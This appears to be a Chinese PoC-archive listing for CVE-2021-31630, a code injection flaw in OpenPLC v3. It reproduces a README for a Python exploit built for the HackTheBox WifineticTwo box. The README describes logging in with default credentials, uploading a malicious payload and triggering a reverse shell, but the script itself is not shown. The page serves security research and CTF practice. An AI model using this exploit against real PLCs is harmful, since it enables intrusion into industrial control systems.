关联漏洞
标题:
OpenPLC 代码注入漏洞
(CVE-2021-31630)
描述:OpenPLC是一种开源的可编程逻辑控制器。可为自动化和研究提供低成本的工业解决方案。 OpenPLC v3 存在代码注入漏洞,该漏洞源于产品的web服务中 /hardware 页面的Hardware Layer Code Box组件未能过滤输入的特殊字符。攻击者可通过该漏洞执行系统命令。
描述
A simple python script to exploit CVE-2021-31630 on HTB WifineticTwo CTF
介绍
# CVE-2021-31630 Exploit PoC
This Python script is a Proof of Concept (PoC) exploit for CVE-2021-31630, targeting a vulnerability in OpenPLC running on the WifineticTwo box at HackTheBox. It is designed for educational purposes only, aiming to demonstrate the exploitation process in a controlled environment.
## Disclaimer
This tool is intended for security research and educational purposes only. Use of this tool for attacking targets without prior mutual consent is illegal. The developer will not be held responsible for any damages or criminal charges against users misusing this exploit.
## Prerequisites
Before running this exploit, ensure you have:
- Python 3 installed on your system.
- The `requests` library installed. You can install it using `pip install requests`.
## Usage
To use this exploit, you must specify the target's URL, the local host IP (LHOST), and the local port (LPORT) to which the reverse shell should connect back. Optionally, you can specify the username and password for OpenPLC if they differ from the default.
```shell
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]
```
### Arguments
- `--target` - Target base address. Example: `http://wifinetictwo.htb:8080`
- `--lhost` - Local host IP address for the reverse shell to connect back to.
- `--lport` - Local port for the reverse shell to connect back to.
- `--usr` - (Optional) Username for OpenPLC. Default is `openplc`.
- `--pwd` - (Optional) Password for OpenPLC. Default is `openplc`.
## Features
- Automatically handles the login process using provided credentials.
- Crafts and uploads a malicious payload to achieve remote code execution.
- Initiates a reverse shell back to the attacker's specified IP and port.
## Exploit Process
1. **Login**: The script logs into the OpenPLC application using the provided credentials.
2. **Payload Crafting**: Dynamically crafts a malicious payload designed to initiate a reverse shell.
3. **Payload Upload**: Uploads the crafted payload to the server.
4. **Exploit Trigger**: Triggers the exploit by attempting to compile the uploaded malicious code, resulting in a reverse shell.
## Acknowledgements
- Special thanks to [Fellipe Oliveira](https://packetstormsecurity.com/files/162563/OpenPLC-WebServer-3-Remote-Code-Execution.html) who discovered and reported CVE-2021-31630.
- HackTheBox for providing a realistic environment to practice and learn about cybersecurity.
文件快照
[4.0K] /data/pocs/301bf2e4c83cb37a48e59d949b8dfa4c464950e7
├── [4.9K] exploit.py
└── [2.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。